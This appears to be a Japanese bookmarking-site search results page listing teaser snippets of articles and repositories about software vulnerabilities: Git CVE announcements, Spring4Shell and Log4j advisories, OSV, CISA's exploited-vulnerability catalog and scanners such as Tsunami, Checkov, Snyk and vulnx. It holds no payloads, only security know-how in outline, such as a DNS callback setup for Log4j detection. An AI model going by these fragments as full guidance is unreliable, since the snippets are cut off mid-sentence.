タグ検索の該当結果が少ないため、タイトル検索結果を表示しています。
Google、オープンソースソフトウェアの脆弱性をバージョンごとにデータベース化する「OSV」(Open Source Vulnerabilities)プロジェクトを開始
Googleは、オープンソースで開発されているソフトウェアの脆弱性がどのバージョンで生じ、どのバージョンで修正されたかなどの詳細をデータベース化する「OSV」(Open Source Vulnerabilities)プロジェクトの開始を発表しました。 オープンソースはクラウド基盤からアプリケーションまで、さまざまな場所で重要な役割を果たすようになってきています。そのため、正確な脆弱性情報の管理もまた重要さを増しています。 OSVにより、オープンソースソフトウェアの開発者やメンテナは手間がかかっていた脆弱性の報告が容易になります。 利用者はオープンソフトウェアの脆弱性がいつ修正されたのかなどの正確な情報を簡単かつ一貫した方法で得られるようになり、利用するソフトウェアの脆弱性の管理と対応を迅速かつ容易にできるようになります。 バグの再現手順を提供すればOSVが自動的にバージョン情報などを探索
The History of DNS Vulnerabilities and the Cloud
By Daniel Prizmant December 28, 2020 at 6:00 AM Category: Unit 42 Tags: DNS, vulnerabilities This post is also available in: 日本語 (Japanese) Introduction Every now and then, a new domain name system (DNS) vulnerability that puts billions of devices around the world at risk is discovered. DNS vulnerabilities are usually critical. Just imagine that you browse to your bank account website, but instead
Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities in Spring | LunaTrace
Getting Spring to load BinderControllerAdvice may require manual steps to have it load. We'll update this guide with more details about how to do that soon. import org.springframework.core.Ordered; import org.springframework.core.annotation.Order; import org.springframework.web.bind.WebDataBinder; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.bind.
Open SourceSecurityGit security vulnerabilities announcedGit users are encouraged to upgrade to the latest version, especially if they use `git archive`, work in untrusted repositories, or use Git GUI on Windows. Today, the Git project released new versions to address a pair of security vulnerabilities, CVE-2022-41903, and CVE-2022-23521, that affect versions 2.39 and older. Git for Windows was al
AlmaLinux 2722 View AlmaLinux vulnerabilities Alpine 3398 View Alpine vulnerabilities Android 881 View Android vulnerabilities Bitnami 3898 View Bitnami vulnerabilities crates.io 1348 View crates.io vulnerabilities Debian 9859 View Debian vulnerabilities GIT 32996 View GIT vulnerabilities Go 2151 View Go vulnerabilities Linux 13573 View Linux vulnerabilities Maven 4873 View Maven vulnerabilities n
ContainerCVE: Scan Docker containers for security vulnerabilities
Quickly find the CVE's for any public Docker Hub image. Powered by the popular open-source tool Trivy.
脆弱性管理でCVSS基本値だけに振り回されないためのメモ【CVSS v2.0編】 – Feat. Known Exploited Vulnerabilities Catalog
■Known Exploited Vulnerabilities Catalogとは 「Known Exploited Vulnerabilities Catalog」(以下、KEVC)は、米国土安全保障省のCISA(Cybersecurity & Infrastructure Security Agency)が2021年11月3日から公開している情報で名前の通り悪用されたことが知られている脆弱性のカタログです。このカタログに掲載されている脆弱性は2022年2月4日時点で352件で、これらは既に悪用が確認されており、かつ、アメリカの連邦政府に大きな影響を及ぼすため、対応が急がれると判断できるものです。 このカタログに掲載されている項目は以下の通りです。 CVE番号 (CVE) ベンダー/プロジェクト名 (Vendor/Product) 製品脆弱性名 (Vulnerability Name)
GitHub - google/tsunami-security-scanner: Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert
GitHub - bridgecrewio/checkov: Prevent cloud misconfigurations and find vulnerabilities during build-time in infrastructure as code, container images and open source packages with Checkov by Bridgecrew.
Over 1000 built-in policies cover security and compliance best practices for AWS, Azure and Google Cloud. Scans Terraform, Terraform Plan, Terraform JSON, CloudFormation, AWS SAM, Kubernetes, Helm, Kustomize, Dockerfile, Serverless framework, Ansible, Bicep and ARM template files. Scans Argo Workflows, Azure Pipelines, BitBucket Pipelines, Circle CI Pipelines, GitHub Actions and GitLab CI workflow
Open SourceSecurityGit security vulnerabilities announcedGit users are encouraged to upgrade to the latest version, especially if they use `git apply` or `git clone` against untrusted patches or repositories. Today, the Git project released new versions to address a pair of security vulnerabilities, (CVE-2023-22490 and CVE-2023-23946) that affect versions 2.39.1 and older. These affect Git’s local
Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service | Amazon Web Services
AWS Security Blog Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service July 27, 2021: We’ve updated the link to the 2019 re:Invent session on this topic. Since it first launched over 10 years ago, the Amazon EC2 Instance Metadata Service (IMDS) has helped customers build secure and scalable applications. The I
TCP SACK PANIC - Kernel vulnerabilities - CVE-2019-11477, CVE-2019-11478 & CVE-2019-11479 | Red Hat Customer Portal
0 Get notified when this content is updated. Follow Please wait...
An Exploration & Remediation of JSON Interoperability Vulnerabilities
Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management. Read the Report ›
GraphQL Vulnerabilities | Application Security Cheat Sheet
GraphQL is a query language designed to build client applications by providing an intuitive and flexible syntax and system for describing their data requirements and interactions. GraphQL uses a declarative approach to fetching data, clients can specify exactly what data they need from the API. As a result, GraphQL provides a single endpoint, which allows clients to get the necessary data, instead
Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (A locked padlock) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.
GitHub - anouarbensaad/vulnx: vulnx 🕷️ an intelligent Bot, Shell can achieve automatic injection, and help researchers detect security vulnerabilities CMS system. It can perform a quick CMS security detection, information collection (including sub-domain
vulnx 🕷️ an intelligent Bot, Shell can achieve automatic injection, and help researchers detect security vulnerabilities CMS system. It can perform a quick CMS security detection, information collection (including sub-domain name, ip address, country information, organizational information and time zone, etc.) and vulnerability scanning. License
Spam attack on Twitter/X rival Mastodon highlights 'fediverse' vulnerabilities | TechCrunch
Spam attack on Twitter/X rival Mastodon highlights ‘fediverse’ vulnerabilities A spam attack that impacted the open source X rival Mastodon, Misskey and other apps highlights how the decentralized social web, also known as the fediverse, is open to abuse. Over the past several days, attackers have targeted smaller Mastodon servers, taking advantage of open registrations to automate the creation of
Blog? Why do people use words containing 'log' so often? The initial title for this article was "Why the Apache model sucks". It would have been a catchier title but would taint my arguments with triviality. But it was the first title that came to my mind and you should be aware of that. I have written about Apache in the past past and the present post is a rehash with a slightly different emphasi
half of curl’s vulnerabilities are C mistakes | daniel.haxx.se
I spent a lot of time and effort digging up the numbers and facts for this post! Lots of people keep referring to the awesome summary put together by a friendly pseudonymous “Tim” which says that “53 out of 95” (55.7%) security flaws in curl could’ve been prevented if curl had been written in Rust. This is usually in regards to discussions around how insecure C is and what to do about it. I’ve blo
We will continue to update this blog with any key updates, including updates on the disclosure of any new related vulnerabilities. This blog includes links to detailed blogs on each of the disclosed vulnerabilities, as well as two open source tools to aid in exploit detection. Snyk security researcher Rory McNamara, with the Snyk Security Labs team, identified four vulnerabilities — dubbed "Leaky
Amazon Inspector Now Scans AWS Lambda Functions for Vulnerabilities | Amazon Web Services
AWS News Blog Amazon Inspector Now Scans AWS Lambda Functions for Vulnerabilities Amazon Inspector is a vulnerability management service that continually scans workloads across Amazon Elastic Compute Cloud (Amazon EC2) instances, container images living in Amazon Elastic Container Registry (Amazon ECR), and, starting today, AWS Lambda functions and Lambda layers. Until today, customers that wanted
GitHub - NCSC-NL/OpenSSL-2022: Operational information regarding CVE-2022-3602 and CVE-2022-3786, two vulnerabilities in OpenSSL 3
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert
Practical Approach to Automate the Discovery and Eradication of Open-Source Software Vulnerabilities at Scale
Practical Approach to Automate the Discovery and Eradication of Open- Source Software Vulnerabilities at Scale Aladdin Almubayed Senior Application Security Engineer @ Netflix @0xshellrider @ @ Outline • The problem of open source security (5 minutes) • Attacks on open source dependencies (10 minutes) • Our approach (25 minutes) • Challenges & Future work (5 minutes) @ @0xshellrider Aladdin Almuba
Tsunami: An extensible network scanning engine to detect severity vulnerabilities with confidence
The latest news from Google on open source releases, major projects, events, and student outreach programs. Tsunami: An extensible network scanning engine to detect severity vulnerabilities with confidence We have released the Tsunami security scanning engine to the open source communities. We hope that the engine can help other organizations protect their users’ data. We also hope to foster colla
OpenSSL Statement on the Recent Intel/AMD Downfall/Inception Vulnerabilities - OpenSSL Blog
Last week marked the public announcement of the Downfall vulnerability in Intel CPUs and the Inception vulnerability in AMD CPUs. Both of these are microarchitectural side-channel attacks allowing an attacker with unprivileged execution on the same physical core as a victim process to extract confidential information from that process. This blog post provides information and advice for users of Op
GitHub - Speykious/cve-rs: Blazingly 🔥 fast 🚀 memory vulnerabilities, written in 100% safe Rust. 🦀
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert
Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities in Spring | LunaTrace
Getting Spring to load BinderControllerAdvice may require manual steps to have it load. We'll update this guide with more details about how to do that soon. import org.springframework.core.Ordered; import org.springframework.core.annotation.Order; import org.springframework.web.bind.WebDataBinder; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.bind.
Helping You Better Identify Vulnerabilities in Partnership with Snyk | Docker
Helping You Better Identify Vulnerabilities in Partnership with Snyk We are really excited that Docker and Snyk are now partnering together to engineer container security scanning deeply into Docker Desktop and Docker Hub. Image vulnerability scanning has been one of your most requested items on our public roadmap. Modern software uses a lot of third party open source libraries, indeed this is one
Open SourceSecurityGit security vulnerabilities announcedUpgrade your local installation of Git, especially when cloning with --recurse-submodules from untrusted repositories, or if you use git shell interactive mode. Today, the Git project released new versions to address a pair of security vulnerabilities (CVE-2022-39253, and CVE-2022-39260) that affect versions 2.38 and older. These affect Git’
GitHub - snyk/cli: Snyk CLI scans and monitors your projects for security vulnerabilities.
Snyk is a developer-first, cloud-native security tool to scan and monitor your software development projects for security vulnerabilities. Snyk scans multiple content types for security issues: Snyk Open Source: Find and automatically fix open-source vulnerabilities Snyk Code: Find and fix vulnerabilities in your application code in real time Snyk Container: Find and fix vulnerabilities in contain
Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021
Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints On December 14, 2021, the following critical vuln
Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program I want to share my frustrating experience participating in Apple Security Bounty program. I've reported four 0-day vulnerabilities this year between March 10 and May 4, as of now three of them are still present in the latest iOS version (15.0) and one was fixed in 14.7, but Apple decided to cover it up and
GitHub - cisagov/log4j-scanner: log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
Configure your own DNS Server - Preferred) - Add DNS records to your domain. (example.com) A record with a value of your IP address (test.example.com -> ) NS record (ns1.example.com) with a value of the test.example.com as chosen above. Host a DNS server to log DNS requests made to your domain. Install the requirement modules -> pip3 install -r requirements.txt Modify the dns/ddnsserver.py script
GitHub - lirantal/is-website-vulnerable: finds publicly known security vulnerabilities in a website's frontend JavaScript libraries
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert
Docker Security Advisory: Multiple Vulnerabilities in runc, BuildKit, and Moby | Docker
* Only CVE-2024-21626 and CVE-2024-24557 were fixed in Moby 24.0.9. If you are unable to update to an unaffected version promptly after it is released, follow these best practices to mitigate risk: Only use trusted Docker images (such as Docker Official Images). Don’t build Docker images from untrusted sources or untrusted Dockerfiles. If you are a Docker Business customer using Docker Desktop and
Open SourceSecurityGit security vulnerabilities announcedA new set of Git releases were published to address a variety of security vulnerabilities. All users are encouraged to upgrade. Take a look at GitHub’s view of the latest round of releases. Today, the Git project released new versions to address a pair of security vulnerabilities, CVE-2023-25652 and CVE-2023-29007, that affect versions 2.40.
Vulnerability Spotlight: Two vulnerabilities in Zoom could lead to code execution
Vulnerability Spotlight: Two vulnerabilities in Zoom could lead to code execution A member of Cisco Talos discovered this vulnerability. Cisco Talos recently discovered two vulnerabilities in the popular Zoom video chatting application that could allow a malicious user to execute arbitrary code on victims’ machines. Video conferencing software has skyrocketed in popularity during the COVID-19 pand
On July 2nd, 2019, Snyk published a high severity prototype pollution security vulnerability (CVE-2019-10744) affecting all versions of lodash, as the result of an on-going analysis lead by the Snyk security research team. UPDATE: lodash published version 4.17.12 on July 9th which includes Snyk fixes and remediates the vulnerability. We strongly recommend you update to the latest version of lodash
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Git security vulnerabilities announced | The GitHub Blog
![[速報] IAMのMFA(多要素認証)でPasskeyが利用できるようになりました | DevelopersIO](https://cdn-ak-scissors.b.st-hatena.com/image/square/001a85b3d2d1df2cc863e2347b85bfa4f9bf04e6/height=288;version=1;width=512/https%3A%2F%2Fdevio2023-media.developers.io%2Fwp-content%2Fuploads%2F2024%2F06%2FIMG_3975-1.jpg)
OSV - Open Source Vulnerabilities
Git security vulnerabilities announced
Known Exploited Vulnerabilities Catalog | CISA
The forces and vulnerabilities of the Apache model
Leaky Vessels: Docker and runc Container Breakout Vulnerabilities - January 2024 | Snyk
/blog/2021/03/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/
Git security vulnerabilities announced
Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program
Git security vulnerabilities announced
/blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
Snyk research team discovers severe prototype pollution security vulnerabilities affecting all versions of lodash | Snyk
tamakai.xyz
sulog.net
mainichi.jp
blog.livedoor.jp/nwknews
ay-style.net
blog.livedoor.jp/nwknews